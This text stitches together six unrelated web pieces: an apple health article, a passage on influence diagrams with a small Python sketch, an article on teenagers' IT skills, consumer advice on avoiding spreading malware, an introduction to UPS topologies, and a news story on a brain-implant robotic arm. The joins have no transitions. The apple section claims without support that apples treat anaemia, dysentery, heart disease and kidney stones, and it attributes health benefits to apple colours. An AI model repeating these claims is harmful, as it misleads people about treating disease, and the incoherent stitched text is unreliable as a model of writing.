Greek and Roman mythology refer to apples as symbols of love and beauty. Apples contain vitamins and minerals such as vitamin C, beta-carotene, iron and potassium. The vitamin C content may not be as high as in oranges, but apples have a very high mineral content, along with pectins and malic acid, which are good for normalizing the intestines. Apples are good for the treatment of anaemia, dysentery, heart disease, headache, eye disorders and kidney stones, and they promote vigour and vitality. Apple juice is good for overcoming a liverish feeling; further, apples are unlikely to cause allergic reactions and are an excellent means of providing essential fluids to the body. A popular saying about apples is that they combine the best attributes of something old and something new. A number of components in apples have been found in studies to lower blood cholesterol, with a reduced risk of ischemic heart disease, stroke, prostate cancer, type II diabetes and asthma. A new study, whose findings have been published in the Journal of Alzheimer's Disease, is sure to bring cheer for people suffering from this strange disease. This study suggests that eating apples and drinking apple juice, in conjunction with a balanced diet, can protect the brain from the effects of oxidative stress, and that we should eat such antioxidant-rich foods. Apples are also good for treatment of the acid reflux condition, also called GERD (gastroesophageal reflux disease). It is well said that our diet should include, apart from vegetables, fresh coloured fruits like yellow apples, green apples and red apples, which are easily available considering that some of the best apples come from places like Kashmir and Himachal Pradesh. Of course, imported apples like Washington apples and Australian apples are available at big departmental stores. Some of the well-known apple varieties are Golden Noble and Bramley. As in vegetables like the carrot, the colours in fruits like apples are indicative of good health, as shown below:
- Green Apples - Good for strong bones and teeth; aid vision; anti-cancer properties.
- Yellow Apples - Good for the heart, eyes and immune system; reduce the risk of some cancers.
- Red Apples - Good for the heart and memory function; lower the risk of some cancers; help maintain urinary tract health.
So let's seize the opportunity to include as many apples as we can in our diet for the good health of the whole family.
Another decision analysis tool is the influence diagram. It provides a graphical presentation of a decision situation and serves as a framework for expressing the exact nature of the relationships among variables. The term influence refers to the dependency of one variable on the level of another. An influence diagram maps all the variables in a management problem. Influence diagrams use a variety of geometric shapes to represent the different elements; the following conventions for creating influence diagrams were suggested by Bodily (1985) and others. The three types of variables are connected with arrows that indicate the direction of the influence. The shape of the arrow also indicates the type of relationship. Preference between outcome variables is shown as a double-line arrow. Arrows can be one-way or two-way (bi-directional). Influence diagrams (see Figure 9.4) can be constructed at any degree of detail and sophistication. This type of diagram enables a model builder to remember all of the relationships in the model and the direction of each influence. Several software products are available that help users create and implement influence diagrams, including DAVID, which helps a user build, modify, and analyze models in an interactive graphical environment, and DPL (from ADA Decision Analysis, Menlo Park, CA), which provides a synthesis of influence diagrams and decision trees.
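As a minimal sketch, an influence diagram can be represented in code as a directed graph whose nodes are typed variables. The three node types used here (decision, chance, outcome) follow one common convention, and the variable names (unit price, units sold, profit) are made-up examples, not taken from the text:

```python
from collections import defaultdict

class InfluenceDiagram:
    """A directed graph of typed variables; an arc from A to B means
    the level of A influences B."""
    NODE_TYPES = {"decision", "chance", "outcome"}

    def __init__(self):
        self.nodes = {}                      # variable name -> node type
        self.influences = defaultdict(list)  # name -> names it influences

    def add_node(self, name, kind):
        if kind not in self.NODE_TYPES:
            raise ValueError(f"unknown node type: {kind}")
        self.nodes[name] = kind

    def add_influence(self, src, dst):
        self.influences[src].append(dst)

    def influenced_by(self, name):
        """All variables whose level influences `name`."""
        return [s for s, targets in self.influences.items() if name in targets]

d = InfluenceDiagram()
d.add_node("unit price", "decision")
d.add_node("units sold", "chance")
d.add_node("profit", "outcome")
d.add_influence("unit price", "units sold")
d.add_influence("unit price", "profit")
d.add_influence("units sold", "profit")
print(d.influenced_by("profit"))   # ['unit price', 'units sold']
```

Walking the `influences` mapping is how a tool like DPL can convert such a diagram into an equivalent decision tree, since the arcs fix which variables must be resolved before each outcome.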
As IT professionals, we've seen technology change very rapidly over the past 10 years. We've managed to keep pace and learn new skills on the job or through training courses. What might surprise you are the skills that high school kids possess today. Here is a look at some skills that many high school kids have — do you?

Blogging in one form or another has been around since the early '90s. The term blog was used by Peter Merholz in 1999. It seems everyone has a blog of one sort or another. In many cases, it is a random collection of thoughts and opinions on various subjects. Blogging has become a way for people to be heard in a forum that allows them to express themselves in a "safe" place. Blogs can also be used to offer advice on some piece of IT equipment or answer questions posed by others.

Why Linux, one might ask? The popularity of Linux lies in the fact that it is easily customizable, that it can be installed on just about any system, and, perhaps most importantly, that it is open source (read: free). Linux is free — you can copy and distribute it without fees or royalties. The source code for Linux is available to anyone who wants to download the installation files from the internet. It is really surprising just how many Linux systems are owned and maintained by teenagers for just these reasons. What you might also be surprised to know is that there is an excellent productivity suite called OpenOffice.org.

This should not come as a surprise — especially for open source programming languages such as Perl, PHP, Python, and Ruby. While not necessarily writing applications for an enterprise environment, teens are still writing applications. Where might these applications be available? Why not look at any one of the common "store fronts" for smartphones? Or how about drivers for hardware devices in Linux?

Game Consoles and On-Line Games

Not really IT skills as such — but gaming is still something that a lot of teenagers do on a daily basis. In some cases, modifications are made to the consoles to "enhance" game play. Now mind you — most of these mods are against the End User License Agreement (EULA). Even so, there are a number of ingenious modifications that have been made, including larger hard drives, open-source operating systems and more. Some of the on-line games, such as World of Warcraft (WoW) and Rift, are almost worlds unto themselves and have their own language and "culture". Those who play these games share a common set of game (IT) skills. Again, these are not IT skills that adults might be accustomed to, but when WoW has an estimated game population in excess of 10 million people, there must be some kind of knowledge transfer between the players.

There was a time when teenagers would tinker with cars. Now many teens are tinkering with their computers. There are many things that can be done to improve the performance of a computer, and teens are readily adept at doing so — from overclocking the CPU to enhanced cooling methods and even designing and building computer cases. Today's teens are incredibly innovative (well, so were those who had the old Commodores; we just had less hardware to work with).

Texting has become controversial lately due to people driving and texting at the same time — not a good idea. Many mobile calling plans have a texting package where you can send 5,000+ text messages a month (a mere 166 messages a day or so). How many texts do high schoolers send on an average day? According to one study, "nearly one out of three kids between 13 and 17 years old send over 3,339 texts a month." Texting has rapidly become the primary means of communication, to the point where actual phone usage has dropped (though data usage has increased). How many texts does the average adult send? A mere 10 per day. Now my question to you is: DY knw h2 uz txt msgN? If not, then follow this link and see: http://www.lingo2word.com/translate.php

Why tweet (or retweet)? A tweet is a post or status update on Twitter, a microblogging service. Each tweet can be only 140 characters or less — so using Twitter is as much about messaging as it is about being creative with your tweet (and maximizing what your 140 characters display). Tweeting is gaining popularity with the younger user base — just not as quickly as texting, since tweets are broadcast out to everyone following you, whereas teens are mainly interested in socializing with their friends.

This one came up a lot, and for a variety of reasons. Creating web sites is still in strong demand even though there are numerous places where one can design and publish a website. This is an excellent way for creative high school students to learn invaluable IT skills and potentially earn some money. Along with the ease of creating websites has come the ability to create multimedia clips, which are finding their way onto YouTube and other sites.

Ok, I know, EVERYONE is using Facebook — but included in this audience are high schoolers. I doubt that they are using Facebook to get in touch with old school mates, but rather to maintain contact with current friends and, especially, current activities. Are some playing the games found in Facebook? Of course — otherwise we wouldn't be inundated with requests to play a game so that the invitee can access new levels or features.

Yes, that's right, tech support. I don't mean technical support at the enterprise level, but teenagers are providing technical support for their families. In many cases, their assistance is used by churches and non-profit organizations that don't have the wherewithal to hire an IT consultant. Some schools have used their more IT-inclined students for assistance (not for the production computers, of course, but for lab PCs). This tech support help also carries over to helping with their friends' computers and other hardware devices (think wireless, routers and home networks). Home networks and streaming media are another area where you find a younger crowd more involved.

What is surprising here is not that high school students are IT savvy, but the extent and breadth of their knowledge. It is remarkable seeing how quickly a teenager can figure out the inner workings of a smartphone while the adult fumbles with learning just how to turn the phone on in the first place. I want to thank Christopher Jenkins, whose help was invaluable for this article.
A lot has been said over the years about the best ways to protect your machine from attacks and malicious code. But where do those recommendations intersect with ways to protect your friends from attacks? By failing to protect your own data, you're sometimes putting them at risk as well. Here are a few ways people end up mindlessly spreading the malware love.

1. Neglect to Scan That File Before You Share It
That spreadsheet you shared with your friends to organize a summer beach trip could end up bringing with it some unexpected cooties. But a quick once-over with an up-to-date antivirus scanner will help keep your trip relaxing.

2. Pick Up Abandoned USB Keys and Use/Share Them
Would you pick up and use a comb someone dropped in the parking lot? Probably not – who knows what sorts of grossness could be lurking on it! But not everyone is so fastidious about their digital hygiene. A shocking number of people in one study picked up a "lost" USB drive in a parking lot. Ew. Even experts are not immune. And then to share it with your friends? Totally uncouth. USB sticks are considered an infection vector unto themselves, as many Windows-based threats will attempt to run automatically upon inserting the drive. While it may not affect you, it may get your friends.

3. Click on Every Stupid Link on Facebook
OMG, your best friend from the 3rd grade just posted something that offers a free ticket to a tropical, sunny location just for clicking on a link! Who could it possibly harm to try it? Sometimes those scams come with more than you bargain for, and you could in fact be putting your friends' data up for grabs by clicking that link. Be skeptical of links that seem shocking or potentially scammy. Ask your friend if they intended to post the link if you really feel inclined to click.

4. Fall for Phishing Scams
It's tough when phishing emails are getting increasingly sophisticated and adept at making scary claims about what will happen if you don't click that link. But it's always a good idea to verify before you trust. Since the aim of phishing is in part to steal your contact data so the scammers can hit your friends too, there's more on the line than just your own data. If you receive an email from any of your accounts (social, financial, or otherwise) saying that you need to click a link and access your account, you can indeed check your account to be safe, but never do it via a link in email. Go directly to your browser and type in the address for the site.

5. Use a Weak Password on Your Email/Social Networking Accounts
This is much the same idea – your password doesn't just protect access to your account, but access to your friends' data as well. Choose unique, strong passwords and change them often, or just use a password manager that will do the heavy lifting for you. (After all, the most secure password is the one you don't know.)

6. Break into Your Neighbors' WiFi
It's tempting, as more and more people get WiFi routers at home, to simply poach your neighbor's bandwidth and save yourself a few bucks a month. But you really don't have any idea what their level of protection is. I attempted this once on a sacrificial research machine, for the sake of curiosity and science, and the machine was infected almost immediately. That blew even my jaded, professionally paranoid mind. If you then have friends over who connect to your network, you could be putting them at risk, too.

7. Install Pirated Software on Your Friends' Computer
Oh, the digital hygiene horror! This is the InfoSec equivalent of having a dinner party to share your "freegan" dumpster-diving haul. It's one thing to take your chances with your own intestinal tract or computing device, but it's another thing entirely to share that with your friends. Warez is a popular way for malware authors to spread their wares, as many people still believe you can get something for nothing without realizing the potential consequences.

8. Be Lazy About Updating Your WordPress Installation
Your friends love your blog about designer dog sweaters, but it's not yet caught on with the general public. So who needs to get around to updating it with the latest and greatest WordPress version? It's precisely that problem (okay, maybe not the dog sweater part) that led to the explosion of Flashback. Lots of people with old blogs got compromised, and their friends and fans paid the price.

It only takes a little thought and effort to avoid common ways of spreading malware. The investment is far less than it would take to write sincere, contrite apology emails to your friends and family members who had to deal with the virtual crud they got from you.
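The strong-password advice in point 5 can be put into practice with a few lines of Python, using the standard library's `secrets` module (which draws from the OS's cryptographic random source). The 16-character default and the character set below are arbitrary illustrative choices, not a recommendation from the article:

```python
import secrets
import string

def strong_password(length: int = 16) -> str:
    """Generate a random password from letters, digits and punctuation
    using a cryptographically secure random source."""
    alphabet = string.ascii_letters + string.digits + string.punctuation
    return "".join(secrets.choice(alphabet) for _ in range(length))

print(strong_password())    # different on every run
print(strong_password(24))  # longer is stronger
```

A password manager does essentially this for you, plus the part humans are bad at: remembering a different result for every account.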
There is much confusion in the marketplace about the different types of UPS systems and their characteristics. Each of these UPS types is defined, practical applications of each are discussed, and advantages and disadvantages are listed. With this information, an educated decision can be made as to the appropriate UPS topology for a given need. The varied types of uninterruptible power supplies (UPS) and their attributes often cause confusion in the data center industry. For example, it is widely believed that there are only two types of UPS systems, namely standby UPS and on-line UPS. These two commonly used terms do not correctly describe many of the UPS systems available. Many misunderstandings about UPS systems are cleared up when the different types of UPS topologies are properly identified. UPS topology indicates the basic nature of the UPS design. Various vendors routinely produce models with similar designs, or topologies, but with very different performance characteristics. Common design approaches are reviewed here, including brief explanations about how each topology works. This will help you to properly identify and compare systems.
One man’s seemingly simple act of drinking a beer has raised hopes about the potential for people with limited mobility to regain some independence. Californian Erik G. Sorto, paralyzed from the neck down more than 10 years ago, was able to will a robotic arm to smoothly move a glass of cold beer to his lips. The technology that helped him do that is a chip implanted in the posterior parietal cortex, the part of the brain that processes intentions. It’s the first time a chip was implanted in that part of the brain. Currently, chips are implanted in the motor cortex, the part of the brain that controls movement. But the results have been stilted, jerky movements. The brain chip implants are part of a clinical collaboration between Caltech, Keck Medicine of USC and Rancho Los Amigos National Rehabilitation Center. “This research is relevant to the role of robotics and brain-machine interfaces as assistive devices, but also speaks to the ability of the brain to learn to function in new ways,” said neurologist Mindy Aisen, chief medical officer at Rancho Los Amigos. “We have created a unique environment that can seamlessly bring together rehabilitation, medicine, and science as exemplified in this study.” The results of the clinical trial appear in the May 22, 2015, edition of the journal Science. Sorto’s success is only the beginning. According to the Washington Post: Researchers are working on all manner of silicon-based devices that go inside the body and manipulate the body’s signals to create motion. They believe these chips will not only be able to help those with paralysis one day -- but also usher in a new era of robot adjuncts controlled by someone’s thoughts that will be able to perform all manner of jobs from lifting dangerous objects to filing papers. In the long term, the technology could mean greater independence for people with disabilities. And that’s something we could all raise a glass to.
This story, "That must have been one great-tasting beer" was originally published by Fritterati.